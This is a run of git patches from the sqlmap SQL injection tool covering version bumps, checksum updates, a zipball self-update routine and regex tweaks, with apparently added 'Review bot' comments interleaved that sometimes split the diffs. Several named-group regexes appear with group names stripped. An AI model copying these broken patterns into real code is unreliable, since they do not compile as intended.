999cb8d0d52820d30bdd4b3d658a765d plugins/dbms/oracle/connector.py e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py @@ -184,8 +184,8 @@ f99c23db4ee6a6b8c0edbf684d360ad3 plugins/dbms/postgresql/connector.py 7cdb821884e5f15084d1bea7f8a50574 plugins/dbms/postgresql/enumeration.py c8bb829d45752b98e6a03817b92e0fe5 plugins/dbms/postgresql/filesystem.py 603d533d924498378eccba4f0f196be6 plugins/dbms/postgresql/fingerprint.py -4fe6dcf2b43b6dac46f31d75e9de260d plugins/dbms/postgresql/__init__.py -c8c2d660977e3e07182e7cdf31aa786a plugins/dbms/postgresql/syntax.py +470860d3e85d11a67f2220bffaa415e7 plugins/dbms/postgresql/__init__.py +20e6f48f496348be45f3402ebc265dbb plugins/dbms/postgresql/syntax.py 1287acf330da86a93c8e64aff46e3b65 plugins/dbms/postgresql/takeover.py 3009438ba259ca159c5ce9799f27dec1 plugins/dbms/sqlite/connector.py 5194556e6b1575b1349f8ccfd773952b plugins/dbms/sqlite/enumeration.py @@ -195,7 +195,7 @@ f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py 964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py 3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py 6439d15c1e8cdb069056c4fa725326df plugins/dbms/sybase/connector.py -31462dc5a1cd2a1b4eba6762d18fb48c plugins/dbms/sybase/enumeration.py +426698152f63504061e5875e64957691 plugins/dbms/sybase/enumeration.py 74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py c8ee0deaa2309e96d9a409ff1524f3ad plugins/dbms/sybase/fingerprint.py a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 
@@ -203,10 +203,10 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py -554f925e0a66f62b8ba39dd6c95d1e7f plugins/generic/databases.py -764a8fd5a99224910885c6b94a592170 plugins/generic/entries.py +dc07665887191ac977e5377f5a66d288 plugins/generic/databases.py +1db2e179c19e8a38e0ef5075363eb32f plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py -ea0f3b9085061b272bfd98c13ad2d977 plugins/generic/filesystem.py +0c8abe66a78edca0660bfb8049d109e2 plugins/generic/filesystem.py f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py 1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py @@ -229,7 +229,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py 0298d81e9dfac7ff18a5236c0f1d84b6 tamper/base64encode.py -55e9fbe57967e57a05a8ca77c312dc70 tamper/between.py +4d44f868c6c97ced29e306347ce5d650 tamper/between.py e1d2329adc6ca89828a2eaec2951806c tamper/bluecoat.py e3cdf13caedb4682bee3ff8fac103606 tamper/chardoubleencode.py 3b2f68476fbcf8223199e8dd4ec14b64 tamper/charencode.py @@ -244,7 +244,7 @@ dcdc433fe946f1b9005bcd427a951dd6 tamper/equaltolike.py 4393cc5220d2e39c5c9c5a9af4e2635d tamper/greatest.py 25ec62158d3e289bda8a04c8b65686ba tamper/halfversionedmorekeywords.py 9d8c350cbb90d4b21ec9c9db184a213a tamper/htmlencode.py -838212f289632526777b7224bf8aacf9 tamper/ifnull2casewhenisnull.py +3f79551baf811ff70b2ba8795a2064be tamper/ifnull2casewhenisnull.py e2c2b6a67546b36983a72f129a817ec0 tamper/ifnull2ifisnull.py 91c92ee203e7e619cb547643883924ca tamper/informationschemacomment.py 1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py 
@@ -427,7 +427,7 @@ ad7fe23004f8e0d02534c7baa877add3 waf/paloalto.py 166eb53544536e3e86223d513b8b688d waf/proventia.py 78a40eca7ddd14c4eaf911de7748b487 waf/radware.py f5d53758d2008195609557112ce8e895 waf/requestvalidationmode.py -022956799ff08db1a39fe1484d949e54 waf/safe3.py +acb82b21f4032ceb510a58142add02ab waf/safe3.py 67cdf508e7b1f69ddf622a87e0e5e4e8 waf/safedog.py d1b67820442199181815ec3fce27e582 waf/secureiis.py 34f0ec775835744bed601ef7c7a21c9d waf/senginx.py diff --git a/waf/safe3.py b/waf/safe3.py index 2aa46809952..2d4a294c009 100644 --- a/waf/safe3.py +++ b/waf/safe3.py @@ -23,4 +23,3 @@ def detect(get_page): break return retval - From 909a3456e3f00264456b0bab129a47063602d1f9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 13 Mar 2018 14:40:32 +0100 Subject: [PATCH 069/428] Potential fix for #2980 --- lib/core/settings.py | 2 +- plugins/generic/entries.py | 3 +++ txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index b72893f7004..6b20b978b34 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.23" +VERSION = "1.2.3.24" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index c0a94627471..b5638c4096a 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py 
@@ -105,6 +105,9 @@ def dumpTable(self, foundData=None): tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) for tbl in tblList: + if kb.dumpKeyboardInterrupt: + break + if conf.exclude and tbl in conf.exclude.split(','): infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl) singleTimeLogMessage(infoMsg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e2a2c59e146..058a06d560d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -36989c9805e448024fc49aabde49a69e lib/core/settings.py +f4e6be0b4a75c886fafdc080d251c57b lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py @@ -204,7 +204,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py dc07665887191ac977e5377f5a66d288 plugins/generic/databases.py -1db2e179c19e8a38e0ef5075363eb32f plugins/generic/entries.py +a9c8637f0526d751cd1a6a18f91967f5 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py 0c8abe66a78edca0660bfb8049d109e2 plugins/generic/filesystem.py f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py From 3c5e9e75599c8b3c5728015a3fc390501da12f26 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 14 Mar 2018 01:02:26 +0100 Subject: [PATCH 070/428] Fixes #2982 --- lib/controller/controller.py | 2 +- lib/core/common.py | 8 ++++---- lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 9 insertions(+), 9 deletions(-) 
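Review bot: The new `if kb.dumpKeyboardInterrupt: break` leaves the table loop silently, so nothing in the output records which tables were left undumped; a debug line such as `debugMsg = "skipping remaining tables after keyboard interrupt"` followed by `logger.debug(debugMsg)` before the `break` would make the truncated dump explainable. The flag is not cleared anywhere in this hunk, so if it persists across calls the remaining databases iterated by `dumpAll` may be skipped as well — worth confirming where it is reset. dumpTable's body continues outside the hunk.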
diff --git a/lib/controller/controller.py b/lib/controller/controller.py index cbe5aef917e..4e0fbfaa78b 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -152,7 +152,7 @@ def _formatInjection(inj): vector = "%s%s" % (vector, comment) data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype] data += " Title: %s\n" % title - data += " Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place != PLACE.GET and kb.postSpaceToPlus)) + data += " Payload: %s\n" % urldecode(payload, unsafe="&", spaceplus=(inj.place != PLACE.GET and kb.postSpaceToPlus)) data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n" return data diff --git a/lib/core/common.py b/lib/core/common.py index 3f307b1d279..a64e962ed2a 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -2535,7 +2535,7 @@ def findMultipartPostBoundary(post): return retVal -def urldecode(value, encoding=None, unsafe="%%&=;+%s" % CUSTOM_INJECTION_MARK_CHAR, convall=False, plusspace=True): +def urldecode(value, encoding=None, unsafe="%%&=;+%s" % CUSTOM_INJECTION_MARK_CHAR, convall=False, spaceplus=True): """ URL decodes given value @@ -2553,14 +2553,14 @@ def urldecode(value, encoding=None, unsafe="%%&=;+%s" % CUSTOM_INJECTION_MARK_CH pass finally: if convall: - result = urllib.unquote_plus(value) if plusspace else urllib.unquote(value) + result = urllib.unquote_plus(value) if spaceplus else urllib.unquote(value) else: def _(match): charset = reduce(lambda x, y: x.replace(y, ""), unsafe, string.printable) char = chr(ord(match.group(1).decode("hex"))) return char if char in charset else match.group(0) result = value - if plusspace: + if spaceplus: result = result.replace('+', ' ') # plus sign has a special meaning in URL encoded data (hence the usage of urllib.unquote_plus in convall case) result = re.sub(r"%([0-9a-fA-F]{2})", _, result) 
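Review bot: Renaming the keyword parameter `plusspace` to `spaceplus` on `urldecode` changes the signature of a widely used helper, and any caller not among the sites updated in this commit that passes `plusspace=` by keyword will now fail with a TypeError at run time rather than at import. Since the positional order is unchanged, a transitional alias such as `def urldecode(value, encoding=None, unsafe="%%&=;+%s" % CUSTOM_INJECTION_MARK_CHAR, convall=False, spaceplus=True, plusspace=None):` with `spaceplus = plusspace if plusspace is not None else spaceplus` as the first statement keeps both spellings working until the remaining callers are verified. The same rename is applied in the controller.py hunk above and in the `geturl` hunk that follows on the page. urldecode's body continues outside the hunk.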
@@ -3997,7 +3997,7 @@ def geturl(self): url = urldecode(request.get_full_url(), kb.pageEncoding) method = request.get_method() data = request.get_data() if request.has_data() else None - data = urldecode(data, kb.pageEncoding, plusspace=False) + data = urldecode(data, kb.pageEncoding, spaceplus=False) if not data and method and method.upper() == HTTPMETHOD.POST: debugMsg = "invalid POST form with blank data detected" diff --git a/lib/core/settings.py b/lib/core/settings.py index 6b20b978b34..d93f2fc4853 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.24" +VERSION = "1.2.3.25" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 058a06d560d..f9605b7ab46 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,12 +22,12 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py 62a348c0ed32c7e67cd456680791cad5 lib/controller/checks.py -a66044daa98684fde830324c54da98ee lib/controller/controller.py +2ba69df20a4ca72b4255761c3463b8a4 lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -33c03aad7f4c6e7241b6f204560e69ca lib/core/common.py +6266f487eeafeccab0c2d7f43d20e85c lib/core/common.py 1c4c4bf8eacc911378a2e4b2f9f03184 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f4e6be0b4a75c886fafdc080d251c57b lib/core/settings.py +13c487c03a2555f9addb386990b77004 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From 5feb4c3ccdb547e55c3fff808b40afc6e88665d5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 14 Mar 2018 13:36:10 +0100 Subject: [PATCH 071/428] Updated --update mechanism (fetching and extraction of zipball) --- lib/core/settings.py | 3 ++- lib/core/update.py | 59 +++++++++++++++++++++++++++++++++++++++++--- txt/checksum.md5 | 4 +-- 3 files changed, 59 insertions(+), 7 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index d93f2fc4853..62223807eab 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.25" +VERSION = "1.2.3.26" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -29,6 +29,7 @@ ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new" GIT_REPOSITORY = "https://github.com/sqlmapproject/sqlmap.git" GIT_PAGE = "https://github.com/sqlmapproject/sqlmap" +ZIPBALL_PAGE = "https://github.com/sqlmapproject/sqlmap/zipball/master" # colorful banner BANNER = """\033[01;33m\ diff --git a/lib/core/update.py b/lib/core/update.py index 18771bb1517..4d56e1396a2 100644 --- a/lib/core/update.py +++ b/lib/core/update.py 
@@ -5,21 +5,27 @@
 See the file 'LICENSE' for copying permission
 """
 
+import glob
 import os
 import re
+import shutil
 import subprocess
 import sys
 import time
+import urllib
+import zipfile
 
 from lib.core.common import dataToStdout
 from lib.core.common import getSafeExString
 from lib.core.common import pollProcess
+from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.revision import getRevisionNumber
 from lib.core.settings import GIT_REPOSITORY
 from lib.core.settings import IS_WIN
+from lib.core.settings import ZIPBALL_PAGE
 from lib.core.settings import UNICODE_ENCODING
 
 def update():
@@ -29,9 +35,54 @@ def update(): success = False if not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")): - errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository " - errMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY - logger.error(errMsg) + warnMsg = "not a git repository. It is recommended to clone the 'sqlmapproject/sqlmap' repository " + warnMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY + logger.warn(warnMsg) + + message = "do you want to try to fetch the latest 'zipball' from repository and extract it? [Y/n]" + if readInput(message, default='Y', boolean=True): + directory = os.path.abspath(paths.SQLMAP_ROOT_PATH) + + try: + open(os.path.join(directory, "sqlmap.py"), "w+b") + except Exception, ex: + errMsg = "unable to update content of directory '%s' ('%s')" % (directory, getSafeExString(ex)) + logger.error(errMsg) + else: + for wildcard in ('*', ".*"): + for _ in glob.glob(os.path.join(directory, wildcard)): + try: + if os.path.isdir(_): + shutil.rmtree(_) + else: + os.remove(_) + except: + pass + + if glob.glob(os.path.join(directory, '*')): + errMsg = "unable to clear the content of directory '%s'" % directory + logger.error(errMsg) + else: + try: + archive = urllib.urlretrieve(ZIPBALL_PAGE)[0] + + with zipfile.ZipFile(archive) as f: + for info in f.infolist(): + info.filename = re.sub(r"\Asqlmap[^/]+", "", info.filename) + if info.filename: + f.extract(info, directory) + + filepath = os.path.join(paths.SQLMAP_ROOT_PATH, "lib", "core", "settings.py") + if os.path.isfile(filepath): + with open(filepath, "rb") as f: + version = re.search(r"(?m)^VERSION\s*=\s*['\"]([^'\"]+)", f.read()).group(1) + logger.info("updated to the latest version '%s#dev'" % version) + success = True + except Exception, ex: + logger.error("update could not be completed ('%s')" % getSafeExString(ex)) + else: + if not success: + logger.error("update could not be completed") else: 
infoMsg = "updating sqlmap to the latest development revision from the " infoMsg += "GitHub repository" @@ -69,7 +120,7 @@ def update(): infoMsg += "download the latest snapshot from " infoMsg += "https://github.com/sqlmapproject/sqlmap/downloads" else: - infoMsg = "for Linux platform it's required " + infoMsg = "for Linux platform it's recommended " infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')" logger.info(infoMsg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f9605b7ab46..7fd8c7e67ee 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,14 +46,14 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -13c487c03a2555f9addb386990b77004 lib/core/settings.py +f126d635d4d09efd76120f31ae2023ba lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py -1b655a78fe4d937d39131938a4a5a1d6 lib/core/update.py +bf7f5fc45f9ca25f403066b5642cdc67 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py From 4cd859012a0e05d0b0d6191f67336b3d070b1b08 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 15 Mar 2018 11:07:14 +0100 Subject: [PATCH 072/428] Switching zipball update method to experimental --- lib/core/settings.py | 2 +- lib/core/update.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 62223807eab..6f6f05cefc9 100644 --- a/lib/core/settings.py 
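Review bot: The writability probe `open(os.path.join(directory, "sqlmap.py"), "w+b")` truncates the running entry script and leaks the file object, and the whole directory is then removed entry by entry before `urllib.urlretrieve(ZIPBALL_PAGE)` is even attempted, so a failed or interrupted download leaves the user with an empty installation and no way back; the deletion loop's bare `except: pass` also hides why a removal failed, and the temporary file returned by `urlretrieve` is never deleted. Fetching the archive and checking it with `testzip()` first, probing with `os.access`, clearing the directory only afterwards, and removing the temporary file in a `finally` avoids the destructive ordering (sketch below). Nothing beyond the TLS connection authenticates the downloaded code — the same as the git path — which is worth stating in a comment next to the fetch. The rest of update(), including the git branch after the trailing `else:`, lies outside this hunk.
```python
            directory = os.path.abspath(paths.SQLMAP_ROOT_PATH)
            archive = None

            try:
                # fetch and verify the archive before touching the installation,
                # so a failed download cannot leave an empty directory behind;
                # only the TLS connection authenticates this content
                archive = urllib.urlretrieve(ZIPBALL_PAGE)[0]
                with zipfile.ZipFile(archive) as f:
                    if f.testzip() is not None:
                        raise IOError("downloaded archive is corrupted")

                # writability probe that does not truncate sqlmap.py itself
                if not os.access(directory, os.W_OK):
                    raise IOError("directory '%s' is not writable" % directory)

                for wildcard in ('*', ".*"):
                    for _ in glob.glob(os.path.join(directory, wildcard)):
                        if os.path.isdir(_):
                            shutil.rmtree(_)
                        else:
                            os.remove(_)

                with zipfile.ZipFile(archive) as f:
                    for info in f.infolist():
                        # drop the top-level "sqlmap-<rev>/" folder; extract() itself
                        # strips absolute paths and ".." components (Python 2.7.4+)
                        info.filename = re.sub(r"\Asqlmap[^/]+", "", info.filename)
                        if info.filename:
                            f.extract(info, directory)

                # ... unchanged: read VERSION from lib/core/settings.py, log it, success = True ...
            except Exception, ex:
                logger.error("update could not be completed ('%s')" % getSafeExString(ex))
            finally:
                if archive and os.path.isfile(archive):
                    os.remove(archive)

            if not success:
                logger.error("update could not be completed")
```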
+++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.26" +VERSION = "1.2.3.27" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/update.py b/lib/core/update.py index 4d56e1396a2..af939aa6c80 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -39,8 +39,8 @@ def update(): warnMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY logger.warn(warnMsg) - message = "do you want to try to fetch the latest 'zipball' from repository and extract it? [Y/n]" - if readInput(message, default='Y', boolean=True): + message = "do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? [y/N]" + if readInput(message, default='N', boolean=True): directory = os.path.abspath(paths.SQLMAP_ROOT_PATH) try: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7fd8c7e67ee..9875df82eb9 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -46,14 +46,14 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f126d635d4d09efd76120f31ae2023ba lib/core/settings.py +997084efaeadc2d679c5f540503bbff3 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py -bf7f5fc45f9ca25f403066b5642cdc67 lib/core/update.py +af2d1810b6a7ebc61689a53c253ddbaa lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py From 6875c40a0620bed00d8d773f594455c9e448b60f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 16 Mar 2018 14:20:43 +0100 Subject: [PATCH 073/428] Minor update of permission problems detection --- lib/core/settings.py | 4 ++-- lib/request/connect.py | 6 +++++- txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 6f6f05cefc9..df40a0ddd98 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.27" +VERSION = "1.2.3.28" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
@@ -83,7 +83,7 @@ TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)" # Regular expression used for recognition of generic permission messages -PERMISSION_DENIED_REGEX = r"(command|permission|access)\s*(was|is)?\s*denied" +PERMISSION_DENIED_REGEX = r"(?P(command|permission|access)\s*(was|is)?\s*denied)" # Regular expression used in recognition of generic protection mechanisms GENERIC_PROTECTION_REGEX = r"(?i)\b(rejected|blocked|protection|incident|denied|detected|dangerous|firewall)\b" diff --git a/lib/request/connect.py b/lib/request/connect.py index e0ea2a5322d..54c2ae3239c 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1261,7 +1261,11 @@ def _randomizeParameter(paramString, randomParameter): page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None - kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None + + message = extractRegexResult(PERMISSION_DENIED_REGEX, page or "", re.I) + if message: + kb.permissionFlag = True + singleTimeWarnMessage("potential permission problems detected ('%s')" % message) if content or response: return page, headers, code diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9875df82eb9..59f5f6859c1 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -997084efaeadc2d679c5f540503bbff3 lib/core/settings.py +00642325552444173985fa13b74f5b3f lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py 
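Review bot: In the connect.py hunk `kb.permissionFlag` is now only ever set to True; the replaced line reassigned it on every response, so after this change the flag stays raised for the rest of the run once any page has matched, which any caller reading it per response would see as a sticky error. If that is intended a comment should say so; otherwise the per-response semantics are kept with `kb.permissionFlag = bool(message)` before the `if message:` block. The named group of the new PERMISSION_DENIED_REGEX in the settings.py hunk above shows here as `(?P(` with no group name, presumably a rendering loss; `extractRegexResult` depends on that name, so the committed pattern is worth confirming. The enclosing function starts outside the hunk.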
@@ -68,7 +68,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 53c38db67dd4b14fbceee71e4748f874 lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -b91eaa32c602182c4f6e2f7d6de61267 lib/request/connect.py +156376d6a08eb4bc0df31ee79f08820e lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py From d7f24458140224eb4d596d757894553cd872597e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 16 Mar 2018 14:25:27 +0100 Subject: [PATCH 074/428] Minor patch of error message parsing regex --- lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index df40a0ddd98..19d0eea6ca4 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -322,7 +322,7 @@ # Regular expressions used for parsing error messages (--parse-errors) ERROR_PARSING_REGEXES = ( r"[^<]*(fatal|error|warning|exception)[^<]*:?\s*(?P.+?)", - r"(?m)^(fatal|error|warning|exception):?\s*(?P[^\n]+?)$", + r"(?m)^\s*(fatal|error|warning|exception):?\s*(?P[^\n]+?)$", r"(?P[^\n>]*SQL Syntax[^\n<]+)", r"
  • Error Type:
    (?P.+?)
